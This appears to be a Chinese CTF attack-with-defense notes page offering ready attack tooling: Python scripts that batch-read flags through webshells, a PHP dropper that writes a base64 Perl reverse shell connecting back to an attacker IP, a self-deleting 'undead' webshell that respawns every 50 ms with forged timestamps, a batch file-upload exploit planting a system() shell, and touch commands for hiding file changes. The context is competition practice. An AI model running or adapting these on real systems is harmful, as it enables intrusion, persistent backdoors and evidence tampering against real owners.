AWD比赛模式的攻击部分

既简单也复杂: 简单在于攻击流程(探测、打 shell、拿 flag、提交)可以脚本化, 复杂在于漏洞本身的利用难度。

1.赛前检测
2.getflag+sendflag.py
3.php的一些shell脚本
4.一些漏洞能直接getshell的批量脚本
5.典型漏洞的利用(*************)

小流程:

下载(down)靶机源码, 用 D盾 等工具扫描预置后门(webshell); 找到的后门自己可以用, 也要在自己的机器上清掉。

ssh连接配置:https://www.imooc.com/qadetail/65395

shell登陆验证脚本


如果是 root 用户, 可以直接改密码: 把上个脚本的 cmd 改成下面任一条
echo 密码 | passwd --stdin 用户名;    # 仅 RHEL/CentOS 系的 passwd 支持 --stdin
echo testuser:newpasswd | chpasswd    # 通用写法, Debian/Ubuntu 同样可用
注意: 两种写法密码都出现在命令行参数和 shell 历史中, 不要用比赛外还会复用的密码。



touch -r file1 file2 将 file2 的时间改成和 file1 一样 (注意: touch 只能改 atime/mtime, inode 的 ctime 仍会更新为当前时间, stat / find -ctime 照样能发现改动)
1. 同时修改文件的修改时间和访问时间
touch -d "2010-05-31 08:10:30" install.log
2. 只修改文件的修改时间
touch -m -d "2010-05-31 08:10:30" install.log
3. 只修改文件的访问时间
touch -a -d "2010-05-31 08:10:30" install.log



getflag+sendflag



较容易直接getshell的:
上传脚本
命令执行脚本
文件包含脚本

一.赛前检测

shell登陆验证与修改密码.py

# -*- coding:utf-8 -*-
#https://www.cnblogs.com/-qing-/p/11182162.html
import paramiko

# Pre-match SSH check target. Port is kept as a string because ssh_base_pwd()
# converts it with int() itself.
ip, port, username, passwd = '192.168.159.134', '22', 'ctf1', 'ctf1'


# ssh 用户名 密码 登陆
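def ssh_base_pwd(ip, port, username, passwd, cmd='ls'):
    """Log in over SSH with a password, run *cmd* and return its output as text.

    Args:
        ip: target host.
        port: SSH port, as a string or int.
        username, passwd: login credentials.
        cmd: shell command to run (default ``ls``).

    Returns:
        stdout of the command; when stdout is empty a notice is printed and
        stderr is returned instead. Connection and authentication failures
        propagate as paramiko exceptions.
    """
    port = int(port)
    ssh = paramiko.SSHClient()
    # AutoAddPolicy trusts whatever host key the server presents, so anyone
    # spoofing the target on the game network can capture these credentials
    # (and any password change sent through this channel). Acceptable only for
    # throwaway CTF boxes.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # timeout keeps a black-holed target from hanging the pre-match check forever.
    ssh.connect(hostname=ip, port=port, username=username, password=passwd,
                timeout=10)
    try:
        _, stdout, stderr = ssh.exec_command(cmd)
        result = stdout.read()
        if not result:
            print("无结果!")
            result = stderr.read()
    finally:
        # The original only closed on the happy path, leaking the session if
        # exec_command() raised.
        ssh.close()
    return result.decode()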


# Smoke-test the credentials: run the default `ls` and print whatever came back.
a = ssh_base_pwd(ip, port, username, passwd)
print(a)

二.getflag+sendflag.py

#!/usr/bin/python
# coding=utf-8
# https://www.cnblogs.com/-qing-/p/11182162.html
import sys, requests, base64, time


# 利用一句话木马得到flag

# 加载一句话地址的文件
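def shell_list(filepath):
    """Read webshell URLs, one per line, from *filepath*.

    Each line is expected to end in the command parameter, e.g.
    ``http://192.168.174.128/test.php?x=``. Blank lines are skipped and both
    ``\\n`` and ``\\r\\n`` endings are removed (the original left a stray ``\\r``
    on CRLF files, which then ended up inside the request URL).

    Returns:
        list of URL strings; an empty list when the file cannot be opened (a
        message is printed), so callers can iterate without a None check.
    """
    try:
        with open(filepath, "r") as f:
            return [line.rstrip("\r\n") for line in f if line.strip()]
    except (IOError, OSError):
        print("File " + filepath + " Not Found!")
        return []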


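def getflag(filepath):
    """Hit every webshell URL in *filepath*, run the flag-reading command and
    append the responses to a fresh ``flag/flagNNNNN.txt``.

    Args:
        filepath: text file with one webshell URL per line, ending in the
            command parameter (e.g. ``http://192.168.174.128/test.php?x=``).

    Returns:
        Path of the file the flags were written to.

    Exits the process when the flag file cannot be written.
    """
    import os  # local import: keeps the module-level import line untouched

    # Last five chars of the epoch timestamp give a cheap per-run file name.
    out_path = 'flag/flag' + str(time.time())[-5:] + '.txt'
    if not os.path.isdir('flag'):
        os.makedirs('flag')  # the original exited if the directory was missing
    url_list = shell_list(filepath) or []
    # Command the webshell runs; Linux targets read the flag with cat.
    cmd = "cat /home/flag"
    for url in url_list:
        url = url.strip("\n") + cmd
        try:
            res = requests.get(url=url, timeout=5)
        except requests.RequestException:
            print(url + "[ - ] request timeout [ - ]")
            # The original fell through here with `res` unbound (first URL) or
            # holding the *previous* target's response, writing that flag twice.
            continue
        # res.text rather than str(res.content): on Python 3 the latter yields
        # "b'flag{...}'" and the submitted flag is wrong. The body comes from an
        # opponent-controlled box, so treat it as untrusted text, not a flag.
        content = res.text.strip()
        if content:
            try:
                with open(out_path, 'a') as f:
                    f.writelines(content + "\n")
            except (IOError, OSError):
                print("写flag.txt文件失败!!")
                sys.exit()
            print("[+] getflag sucessed! flag文件:" + out_path)
    return out_path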


# 批量提交flag
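def sentflag(filepath, url):
    """Collect flags with getflag() and submit each one with a GET to ``url + flag``.

    Args:
        filepath: webshell list handed to getflag().
        url: submission endpoint ending in the flag parameter, e.g.
            ``http://1.1.1.1/submit.php?token=xxxx&flag=``.

    Each flag is URL-encoded before it is appended: the value came back from an
    opponent's box, so it is untrusted and could otherwise inject extra query
    parameters into the submission request. A failed request is reported and
    the next flag is tried (the original exited on the first failure, dropping
    the rest of the batch).
    """
    try:
        from urllib.parse import quote  # Python 3
    except ImportError:
        from urllib import quote  # Python 2
    filename = getflag(filepath)
    with open(filename, 'r') as f:
        flags = [line.strip() for line in f if line.strip()]
    for flag in flags:
        links = url + quote(flag, safe='')
        try:
            res = requests.get(url=links, timeout=3)
        except requests.RequestException:
            print("[ - ] Send Flag Failed [ - ]")
            continue
        if res.status_code == 200:
            # The original wrote `print("...") % flag`, which only works on
            # Python 2 (TypeError on 3: None % str).
            print("[ + ] Send Flag %s Success [ + ]" % flag)
        else:
            print("[ - ] Send Flag %s Rejected: HTTP %s [ - ]" % (flag, res.status_code))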


# First argument: a file of webshell URLs, one per line, in the form
# http://192.168.174.128/test.php?x=
# Second argument: the flag submission endpoint, e.g.
# http://1.1.1.1/submit.php?token=xxxx&flag=
# The token is a per-team credential - do not commit or share a real one.
filepath = 'duo_webshell.txt'
url = 'http://192.168.159.134:8081/flag.php?token=123&flag='
sentflag(filepath, url)
# Use getflag(filepath) alone to only collect flags without submitting them.
#getflag(filepath)

三.php的一些shell脚本

php反弹shell的脚本.php

<?php
function which($pr) {
    // Resolve $pr through `which`; fall back to the bare name so the caller
    // still tries $PATH when `which` is missing or prints nothing.
    // $pr is interpolated into a shell command - only pass literal names.
    $resolved = execute("which $pr");
    if ($resolved) {
        return $resolved;
    }
    return $pr;
}
function execute($cfe) {
    // Run a shell command through whichever execution primitive the host still
    // allows (disable_functions is common on CTF boxes), in the order
    // exec > shell_exec > system > passthru > popen, and return its output.
    // Every call is @-silenced; '' means "no output" or "nothing worked".
    if (!$cfe) {
        return '';
    }
    $res = '';
    if (function_exists('exec')) {
        @exec($cfe, $res);          // exec() turns $res into an array of lines
        return join("\n", $res);
    }
    if (function_exists('shell_exec')) {
        return @shell_exec($cfe);
    }
    if (function_exists('system') || function_exists('passthru')) {
        // Both write straight to stdout, so capture it with output buffering.
        @ob_start();
        function_exists('system') ? @system($cfe) : @passthru($cfe);
        $res = @ob_get_contents();
        @ob_end_clean();
        return $res;
    }
    if (@is_resource($f = @popen($cfe, "r"))) {
        $res = '';
        while (!@feof($f)) {
            $res .= @fread($f, 1024);
        }
        @pclose($f);
    }
    return $res;
}
function cf($fname, $text) {
    // Write the base64-decoded $text to $fname, silently giving up when the
    // path is not writable. The file is created with the web server's umask,
    // so the dropped payload is normally readable by every local user.
    $fp = @fopen($fname, 'w');
    if (!$fp) {
        return;
    }
    @fputs($fp, @base64_decode($text));
    @fclose($fp);
}
$yourip = "192.168.159.129";   // attacker host; listen there with: nc -l -vv -p 4444
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');   // unused below - leftover from a multi-backend variant
// Base64 of a Perl back-connect script: `use Socket`, sets $0 = "lynx" to
// disguise the process name, connects to ARGV[0]:ARGV[1], dups STDIN/STDOUT/
// STDERR onto the socket and runs `uname -a`, `id`, then /bin/sh.
// Decode and read it before reuse; never deploy an opaque blob blind.
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
// Drop the payload to /tmp/.bc (a dotfile, but world-readable) and start it in the
// background so the HTTP request returns; the file is left behind afterwards.
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
// Upload, then browse to this file; catch the shell with: nc -l -vv -p [port]
?>

不死马:

<?php 
// "Undead" webshell dropper for AWD: keeps running after the HTTP client goes
// away, deletes itself, and re-creates the real shell every 50 ms so that a
// defender's rm is undone almost immediately.
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = './.coN123fig.php';
$code = '<?php if(md5($_POST["pass"])=="a810f40b757f543d7fbccdcad3260ff2"){@eval($_POST[cmd]);} ?>';
// The dropped shell reads BOTH values from POST, not the query string:
//   POST pass=<password>&cmd=<php code>  to  .coN123fig.php
// The password is presumably "N123fi" (the hash is not verified here).
// The md5 guard is a loose == compare; this hash has no "0e..." prefix, so
// type juggling does not apply. NOTE(review): the bare-word $_POST[cmd] relies
// on the undefined-constant-to-string fallback that PHP 8 removed (it throws),
// so the shell only works on PHP 7 and older unless that key is quoted.
for (;;) {
    file_put_contents($file, $code);
    // Pin mtime so the file does not surface in ls -lt / find -mmin;
    // ctime still changes on every rewrite.
    system('touch -m -d "2019-7-21 15:20:54" .coN123fig.php');
    usleep(50000);
}
?>

一些小马:

http://www.naivete.online/2018/08/%e8%bf%87%e7%8b%97%e4%b8%80%e5%8f%a5%e8%af%9d/

四.一些漏洞能直接getshell的批量脚本:

上传批量:

#coding=utf-8
"""
author:图先生
简介:http://www.youknowi.xin/
time:2019/6/22 8:40
filename:CTF_1.py
"""
import hackhttp
import requests
# Raw HTTP client (third-party hackhttp) so the captured request can be replayed
# verbatim with only the Host port substituted via str.format.
hh = hackhttp.hackhttp()
# Multipart upload captured from the browser. Content-Length is hard-coded; it
# must equal the byte length of the body hackhttp actually sends (CRLF vs LF
# matters), so re-count it if the PHP payload or boundary is edited - otherwise
# the upload is truncated or the server waits for bytes that never come.
# "{}" is the only format placeholder in the string (the Host port).
raw='''
POST /upload_file.php HTTP/1.1
Host: 192.168.159.128:808{}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.128:8082/upload.php
Content-Type: multipart/form-data; boundary=---------------------------21093136245927
Content-Length: 336
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------21093136245927
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php
@system($_GET["cmd"]);
-----------------------------21093136245927
Content-Disposition: form-data; name="submit"

Submit
-----------------------------21093136245927--

'''
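# Upload the shell to every target (ports 8081-8084), one request each.
url = "http://192.168.159.128:808{}/upload_file.php"
for i in range(1, 5):
    temp_raw = raw.format(str(i))
    temp_url = url.format(str(i))
    try:
        code, head, html, redirect, log = hh.http(temp_url, raw=temp_raw)
    except Exception as exc:  # boundary of a batch script: one dead target must not abort the rest
        print(temp_url + " [ - ] upload failed: " + str(exc))
        continue
    print(temp_url)
    print(code)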

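# Read each team's flag through the uploaded shell
# (port 808N maps to /home/ctfN/flag).
url = "http://192.168.159.128:808{}/upload/shell.php?cmd=cat%20/home/ctf{}/flag"
for i in range(1, 5):
    target = url.format(str(i), str(i))
    try:
        # The original had no timeout: a target that drops packets hung the
        # whole script and every later team was skipped.
        s = requests.get(target, timeout=5)
    except requests.RequestException as exc:
        print("[ - ] " + target + " failed: " + str(exc))
        continue
    print(s.text)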

命令执行:

文件包含:

弱密码(mysql,后台等)

ssrf

注入

2019.7.18
